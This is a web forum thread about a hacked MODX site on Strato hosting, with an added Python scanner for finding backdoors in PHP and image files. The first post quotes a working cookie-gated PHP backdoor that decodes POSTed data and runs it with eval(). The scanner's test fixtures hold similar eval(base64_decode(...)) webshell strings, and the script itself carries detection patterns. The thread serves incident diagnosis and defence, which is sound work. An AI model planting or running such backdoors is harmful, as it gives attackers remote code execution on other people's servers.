    • 26931
    • 2,314 Posts
    hi there,

    one of my sites recently got hacked on Strato, several php files with similar contents e.g.
    <?php
    // Backdoor dropped into the asset folders: it only responds when a fixed cookie value is
    // presented, then decodes the POSTed payload (urldecode -> base64 -> gzinflate) and eval()s it.
    if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'],0,16)=='3469825000034634'){
        if (!empty($_POST['message']) and $message=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message']))))){
            echo '<textarea id=areatext>';
            eval($message);
            echo '</textarea>bg';
            exit;
        }
    }
    exit;

    were placed in different asset folders. After cleaning up the installation and upgrading via the alternative method the site still gets flagged by Google as "not safe". If I upgrade it again the site is good for ~1 day, then is flagged again, although I never encountered new .php files. Folders are 755 and files 644 and only the cache folder is on 0777 and only has the bare minimum of Snippets, Plugins & Modules

    any ideas what could be going on? anything to look for in logfiles? currently I'm totally baffled and not sure if Google flags false positives or the webhost (Strato, not of any help either) has a security breach.

    cheers & thanks, j
      • 36582
      • 463 Posts
      Read right through the following thread - you may not have removed all the offending files…

      http://forums.modx.com/thread/?thread=93126&page=1
        Web site design in Nottingham UK by Chris Fickling http://www.chrisficklingdesign.co.uk
      • Maybe they have changed some code in MODX database tables too (i.e. snippet/plugin code of custom snippets - everything that is not updated with the install script).

        But I have a strange smell of server issues in your case. On one customer site, the apache access log did not show any foreign request when the javascripts were modified on the installation, so the attack was not done through a MODX issue in that installation. Maybe the vhosts are not separated on that server and the files were modified by a script on another vhost or maybe there is some other server issue. Difficult to say if the provider is not cooperative - and the customer's provider belongs to that type of providers.
          • 26931
          • 2,314 Posts
          Hi Chris, Hi Jako,

          thanks for replying

          Jako, on a reverse IP check I did not find any other sites on that webspace.

          Yes, Strato is a PITA, didn't respond to any of my emails and blocked the site probably because Google flagged it, but weren't communicating at all about the issue. After several emails they unblocked it, but it's still flagged by Google.

          In the logfiles I saw several POSTs to files that were no longer there, but nothing else that was (in my noob eyes) suspicious.

          cheers, j
            • 26931
            • 2,314 Posts
            oh, okay ...the JS files @_@
            • Quote from: sharkbait at Sep 29, 2014, 10:24 AM

              Jako, on a reverse IP check I did not find any other sites on that webspace.

              Different IPs could even point to the same server. But without knowing how the files are changed (by a script on the same vhost, by a script on a different vhost, by something else …), this is academic …

              Quote from: sharkbait at Sep 29, 2014, 10:24 AM

              after several emails the unblocked it, but it's still flagged by google.

              Have you told google that it is cleaned in google webmaster tools?
                • 26931
                • 2,314 Posts
                thanks,

                yes, about to request another site check after removing the injected JS code
                  • 36582
                  • 463 Posts
                  The crux of it from what I saw, was infected .gif files in cgi-bin. This seemed to be where it all started.
                    Web site design in Nottingham UK by Chris Fickling http://www.chrisficklingdesign.co.uk
                    • 26931
                    • 2,314 Posts
                    The crux of it from what I saw, was infected .gif files in cgi-bin. This seemed to be where it all started.
                    in your server root? assuming that means the server was vulnerable, right?
                      • 26931
                      • 2,314 Posts
                      how can I check if a GIF file is infected?
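                      Two checks answer the "infected GIF" question without reverse engineering anything: a real GIF starts with the bytes GIF87a or GIF89a, and no image should contain a PHP open tag or an eval() fed by a decoder. The script below is an added example (not from the thread, Chris's site or MODX) that walks a web root and flags files on those heuristics, which also catch the cookie-gated eval/gzinflate/base64_decode backdoor quoted in the first post; the fixture files are constructed for the example. Expect some noise, since legitimate code also calls base64_decode, which is why the rule only fires when a decoder and an execution call appear together.

```python
import os
import re
import tempfile

# Expected leading bytes per image extension; a ".gif" that does not start this way is not a GIF.
IMAGE_MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}

PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
# Execution and decoding functions as used by the backdoor quoted in the thread.
CALLS = re.compile(
    rb"\b(eval|assert|create_function|gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(",
    re.IGNORECASE,
)
EXECUTORS = {"eval", "assert", "create_function"}
DECODERS = {"gzinflate", "gzuncompress", "base64_decode", "str_rot13"}
COOKIE_GATE = re.compile(rb"\$_COOKIE\s*\[")


def scan_bytes(name, data):
    """Heuristic indicators for one file's contents; returns [] when nothing stands out."""
    ext = os.path.splitext(name)[1].lower()
    found = []
    if ext in IMAGE_MAGIC:
        if not data.startswith(IMAGE_MAGIC[ext]):
            found.append("image extension but wrong magic bytes")
        if PHP_TAG.search(data):
            found.append("PHP open tag inside an image file")
    calls = {m.group(1).decode().lower() for m in CALLS.finditer(data)}
    execs = sorted(calls & EXECUTORS)
    decs = sorted(calls & DECODERS)
    if execs and decs:
        found.append("code execution via %s fed by %s" % ("/".join(execs), "/".join(decs)))
    elif execs:
        found.append("code execution call: " + "/".join(execs))
    if execs and COOKIE_GATE.search(data):
        found.append("execution gated on a cookie value (backdoor access control)")
    return found


def scan_tree(root, max_size=2 * 1024 * 1024):
    """Walk a web root and map each flagged file (relative path) to its indicators."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            if os.path.getsize(path) > max_size:
                continue  # large binaries are a job for a dedicated scanner
            with open(path, "rb") as fh:
                data = fh.read()
            indicators = scan_bytes(path, data)
            if indicators:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = indicators
    return hits


# Constructed fixtures (not files from the thread): a clean GIF, a GIF carrying PHP,
# a cookie-gated eval() backdoor, and a legitimate snippet that merely decodes base64.
FIXTURES = {
    "assets/images/clean.gif": b"GIF89a" + b"\x00" * 32,
    "cgi-bin/loader.gif": b"GIF89a" + b"\x00" * 8 + b"<?php eval(base64_decode($_POST['m'])); ?>",
    "assets/components/x.php": b"<?php if(!empty($_COOKIE['t'])){eval(gzinflate(base64_decode($_POST['m'])));}",
    "core/components/ok.php": b"<?php $raw = base64_decode($_POST['payload']); file_put_contents('/tmp/x', $raw);",
}


def demo():
    """Write the fixtures into a temporary web root, scan it and return the flagged files."""
    with tempfile.TemporaryDirectory() as root:
        for rel, data in FIXTURES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
        return scan_tree(root)


if __name__ == "__main__":
    for path, indicators in sorted(demo().items()):
        print(path)
        for indicator in indicators:
            print("   -", indicator)
```

                      Point `scan_tree()` at the document root (cgi-bin included) and treat every hit as something to diff against a fresh MODX download or a known-good backup; a PHP tag inside a GIF is only dangerous if something executes it (an include, or a handler mapping in cgi-bin), so the file it is paired with matters as much as the image itself.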